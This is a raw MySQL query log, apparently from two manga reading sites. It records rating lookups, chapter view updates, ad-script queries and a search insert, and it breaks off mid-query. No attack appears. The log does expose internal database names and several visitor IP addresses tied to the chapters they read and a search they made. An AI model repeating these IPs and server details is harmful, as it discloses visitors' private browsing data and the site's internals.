Quit 330638348 Quit 330638374 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330638373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638374 Quit 330638373 Query Update chapters set view=view+1 where id = '2025' 330638375 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330638375 Quit 330638376 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330638373 Quit 330638376 Quit 330638377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638377 Query select * FROM chapters where id = '2025' 330638378 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330638378 Quit 330638379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330638377 Quit 330638379 Quit 330638380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638380 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2025' 330638381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330638381 Quit 330638382 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330638382 Quit 330638383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330638384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638380 Quit 330638384 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('51', '2025', '115.70.62.74', 'mangacherri.com', '2026-02-26 03:27:56', '2026-02-26 03:27:56') 330638383 Quit 330638385 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330638385 Quit 330638384 Quit 330638386 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330638386 Quit 330638387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638387 Query select * FROM chapter_images where chapter_id = '2025' 330638388 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330638388 Quit 330638387 Quit 330638389 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330638390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638389 Quit 330638390 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '51' and m.active = 1 330638391 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330638391 Quit 330638392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330638392 Quit 330638393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330638393 Quit 330638394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330638394 Quit 330638395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330638395 Quit 330638396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330638396 Quit 330638397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330638397 Quit 330638398 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330638398 Quit 330638399 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330638399 Quit 330638400 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330638400 Quit 330638401 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330638401 Quit 330638402 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330638402 Quit 330638403 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330638403 Quit 330638404 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638390 Quit 330638404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330638404 Quit 330638405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638405 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='51' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330638406 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330638406 Quit 330638407 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330638407 Quit 330638408 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330638408 Quit 330638409 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330638409 Quit 330638410 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330638410 Quit 330638411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330638411 Quit 330638412 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330638412 Quit 330638413 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330638413 Quit 330638414 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330638414 Quit 330638415 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330638415 Quit 330638416 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330638416 Quit 330638417 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330638417 Quit 330638418 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330638418 Quit 330638419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330638419 Quit 330638420 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330638420 Quit 330638421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330638421 Quit 330638422 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330638422 Quit 330638423 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330638423 Quit 330638424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330638424 Quit 330638425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330638425 Quit 330638426 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330638426 Quit 330638427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330638427 Quit 330638428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330638428 Quit 330638429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330638429 Quit 330638430 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330638430 Quit 330638431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330638431 Quit 330638432 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330638432 Quit 330638433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330638433 Quit 330638434 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330638434 Quit 330638435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330638435 Quit 330638436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330638436 Quit 330638437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330638437 Quit 330638438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330638438 Quit 330638439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330638439 Quit 330638440 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330638440 Quit 330638441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330638441 Quit 330638442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330638442 Quit 330638443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330638443 Quit 330638444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330638444 Quit 330638445 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330638445 Quit 330638446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330638446 Quit 330638447 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330638447 Quit 330638448 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330638448 Quit 330638449 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330638449 Quit 330638450 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330638450 Quit 330638451 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330638451 Quit 330638452 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330638452 Quit 330638453 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330638453 Quit 330638454 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638455 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638454 Quit 330638455 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638455 Quit 260225 19:27:57 330638405 Quit 330638456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638456 Quit 330638457 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330638457 Quit 330638458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638458 Quit 330638459 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638459 Quit 330638460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638460 Quit 330638461 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638461 Quit 330638462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638462 Quit 330638463 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638463 Quit 260225 19:27:58 330638464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638464 Quit 330638465 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14922' 330638465 Quit 330638466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638466 Query select * FROM chapters where id = '14922' 330638466 Quit 330638467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638467 Query select * FROM chapters where manga_id = '292' order by id desc 330638467 Quit 330638468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638468 Query Update chapters set view=view+1 where id = '14922' 330638468 Quit 330638469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638469 Query select * FROM chapters where id = '14922' 330638469 Quit 330638470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638470 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14922' 330638470 Quit 330638471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638471 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('292', '14922', '180.190.50.77', 'mangacherri.com', '2026-02-26 03:27:58', '2026-02-26 03:27:58') 330638471 Quit 330638472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638472 Query select * FROM chapter_images where chapter_id = '14922' 330638472 Quit 330638473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638473 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '292' and m.active = 1 330638473 Quit 330638474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638474 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='292' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Gyaru%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330638474 Quit 330638475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638475 Quit 330638476 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330638476 Quit 330638477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638477 Quit 330638478 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638478 Quit 330638479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638479 Quit 330638480 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638480 Quit 330638481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638481 Quit 330638482 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638482 Quit 330638483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638483 Quit 330638484 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('グラぱらっ!', '218.103.245.11', '2026-02-26 03:27:58') 330638484 Quit 330638485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638485 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%グラぱらっ!%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%グラぱらっ!%' ) ) 330638485 Quit 330638486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638486 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'グラぱらっ!' 330638486 Quit 330638487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638487 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330638487 Quit 330638488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638489 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330638488 Quit 330638489 Quit 330638490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330638490 Quit 330638491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330638491 Quit 330638492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330638492 Quit 330638493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330638493 Quit 330638494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330638494 Quit 330638495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330638495 Quit 330638496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330638496 Quit 330638497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330638497 Quit 330638498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330638498 Quit 330638499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330638499 Quit 330638500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330638500 Quit 330638501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330638501 Quit 330638502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330638502 Quit 330638503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330638503 Quit 330638504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330638504 Quit 330638505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330638505 Quit 330638506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330638506 Quit 330638507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330638507 Quit 330638508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330638508 Quit 330638509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330638509 Quit 330638510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330638510 Quit 330638511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330638511 Quit 330638512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330638512 Quit 330638513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330638513 Quit 330638514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330638514 Quit 330638515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330638515 Quit 330638516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330638516 Quit 330638517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330638517 Quit 330638518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330638518 Quit 330638519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330638519 Quit 330638520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330638520 Quit 330638521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330638521 Quit 330638522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330638522 Quit 330638523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by 